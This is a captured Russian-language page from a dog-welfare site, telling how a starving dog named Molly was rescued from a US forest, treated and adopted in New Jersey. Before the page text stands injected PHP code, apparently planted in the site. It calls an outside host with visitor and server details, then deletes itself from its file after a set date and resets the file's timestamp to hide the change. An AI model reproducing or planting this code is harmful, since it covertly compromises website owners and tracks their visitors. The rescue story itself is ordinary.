check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Новая жизнь «лесной» собаки (США)
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости Новая жизнь «лесной» собаки (США)

Новая жизнь «лесной» собаки (США)

E-mail Печать PDF
>Это трогательная история о собаке Молли, которая имела неприглядный вид и была очень несчастна. Молли была бездомной. К тому времени, как её нашли, она прожила в лесу несколько месяцев. Вид у животного был жалкий: она исхудала, обросла шерстью, сбившейся в колтуны. Ей было совсем нечем питаться, поэтому она ела всё, что попадалось, включая фольгу и тряпки. Но нашлись добрые люди, которых не оттолкнула её обманчивая внешность, и они подарили бедняге новую жизнь.

Двухлетняя собака Молли жила в лесу. Она была истощена и запугана, её спутанный мех висел клочьями, когда её спасли волонтёры Wilson County Humane Society.

Когда собаку привезли в лечебницу, в её желудке нашли множество несъедобных предметов: камни, жёлуди, тряпки и фольга. В лечебнице с неё состригли около 2,5 кг спутанного меха. После стрижки Молли весила около 11 кг, это меньше половины от нормального веса. К счастью, для извлечения посторонних предметов из желудка не понадобилась операция, но собаке требовался уход и забота.



Узнав о собаке, организация по защите животных Burlington County Animal Alliance из Нью-Джерси предложила заняться её судьбой. И через некоторое время собака отправилась туда самолётом Flying Fur Animal Rescue. Она летела прижавшись к пассажирскому сидению, иногда поднимая голову, чтобы посмотреть в окошко.

В Нью-Джерси она три недели находилась на передержке, прежде чем попасть в свою новую семью.

Сначала она была очень робкой, но три ребёнка и две другие собаки помогли ей расслабиться. Её новая хозяйка Шерил Сгрой рассказывает, что поначалу Молли дёргалась от каждого скрипа, но теперь она спокойна.



Сейчас собака здорова и полна энергии, она бегает по снегу и играет со своими друзьями-собаками. Шерил признаётся, что очень благодарна всем, кто помог им приютить Молли. Вся семья её очень любит.




Источник http://daylapu.ru/news.php?ngod=2018&news=16
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

DSC00520.JPG

Реклама


Похожие материалы